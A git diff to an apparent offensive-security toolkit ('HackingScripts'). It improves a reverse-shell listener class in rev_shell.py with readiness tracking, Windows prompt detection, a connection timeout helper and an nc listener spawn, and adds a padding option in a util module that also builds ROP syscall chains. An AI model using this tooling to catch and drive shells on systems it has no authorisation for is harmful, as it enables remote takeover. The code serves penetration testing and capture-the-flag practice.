diff --git a/rev_shell.py b/rev_shell.py index 89c8421..bc52146 100755 --- a/rev_shell.py +++ b/rev_shell.py @@ -32,6 +32,7 @@ class ShellListener: self.connection = None self.on_connect = None self.features = set() + self.shell_ready = False self.os = None # we need a way to find the OS here def startBackground(self): @@ -68,14 +69,14 @@ class ShellListener: if self.on_connect: self.on_connect(addr) - got_first_prompt = False + self.shell_ready = False while self.running: data = self.connection.recv(1024) if not data: break - if self.os is None and not got_first_prompt: - if b"Windows PowerShell" in data: + if self.os is None and not self.shell_ready: + if b"Windows PowerShell" in data or b"Microsoft Windows" in data: self.os = "win" elif b"bash" in data or b"sh" in data: self.os = "unix" @@ -86,11 +87,11 @@ class ShellListener: if self.verbose: print("< ", data) - if got_first_prompt: # TODO: check this... + if self.shell_ready: # TODO: check this... for callback in self.on_message: callback(data) elif self.is_prompt(data): - got_first_prompt = True + self.shell_ready = True if self.verbose: print("RECV first prompt") @@ -101,6 +102,8 @@ class ShellListener: self.running = False self.sendline("exit") self.listen_socket.close() + if self.listen_thread != threading.currentThread(): + self.listen_thread.join() def send(self, data): if self.connection: @@ -123,7 +126,7 @@ class ShellListener: if data.endswith(b"# ") or data.endswith(b"$ "): return True elif self.os == "win": - if data.endswith(b"> "): + if data.endswith(b"> ") or data.endswith(b">"): return True return False @@ -134,6 +137,10 @@ class ShellListener: print("[-] OS not probed yet, waiting...") while self.os is None: time.sleep(0.1) + if not self.shell_ready: + print("[-] Shell not ready yet, waiting...") + while not self.shell_ready: + time.sleep(0.1) output = b"" complete = False @@ -395,11 +402,33 @@ def generate_payload(type, local_address, port, index=None): def spawn_listener(port): pty.spawn(["nc", "-lvvp", str(port)]) -def spawn_background_shell(port): - listener = ShellListener("0.0.0.0", port) - listener.startBackground() +def wait_for_connection(listener, timeout=None, prompt=True): + start = time.time() + if prompt: + prompt = prompt if type(prompt) == str else "[ ] Waiting for shell" + if timeout is not None: + timer_len = sys.stdout.write("\r%s: %ds\r" % (prompt, timeout)) + sys.stdout.flush() + else: + print(prompt) + while listener.connection is None: time.sleep(0.5) + if timeout is not None: + diff = time.time() - start + if diff < timeout: + sys.stdout.write(util.pad(f"\r%s: %ds" % (prompt, timeout - diff), timer_len, " ") + "\r") + sys.stdout.flush() + else: + print(util.pad("\r[-] Shell timeout :(", timer_len, " ") + "\r") + return None + + return listener + +def spawn_background_shell(port, timeout=None, prompt=True): + listener = ShellListener("0.0.0.0", port) + listener.startBackground() + wait_for_connection(listener, timeout, prompt) return listener def trigger_shell(func, port): @@ -410,12 +439,11 @@ def trigger_shell(func, port): threading.Thread(target=_wait_and_exec).start() spawn_listener(port) -def trigger_background_shell(func, port): +def trigger_background_shell(func, port, timeout=None, prompt=True): listener = ShellListener("0.0.0.0", port) listener.startBackground() threading.Thread(target=func).start() - while listener.connection is None: - time.sleep(0.5) + wait_for_connection(listener, timeout, prompt) return listener def create_tunnel(shell, ports: list): diff --git a/template.py b/template.py index 72d3ee3..712e30f 100755 --- a/template.py +++ b/template.py @@ -71,6 +71,9 @@ if __name__ == "__main__": variables = "\n".join(f"{k} = {v}" for k, v in variables.items()) header = f"""#!/usr/bin/env python +# THE BASE OF THIS FILE WAS AUTOMATICALLY GENERATED BY template.py, for more information, visit +# https://git.romanh.de/Roman/HackingScripts + import os import re import sys diff --git a/util.py b/util.py index da72f50..2b7f2bd 100755 --- a/util.py +++ b/util.py @@ -189,9 +189,9 @@ def genSyscall(elf, syscall, registers): rop.raw(rop.find_gadget([syscall_gadget]).address) return rop -def pad(x, n): +def pad(x, n, b=b"\x00"): if len(x) % n != 0: - x += (n-(len(x)%n))*b"\x00" + x += (n-(len(x)%n))*b return x def xor(a, b):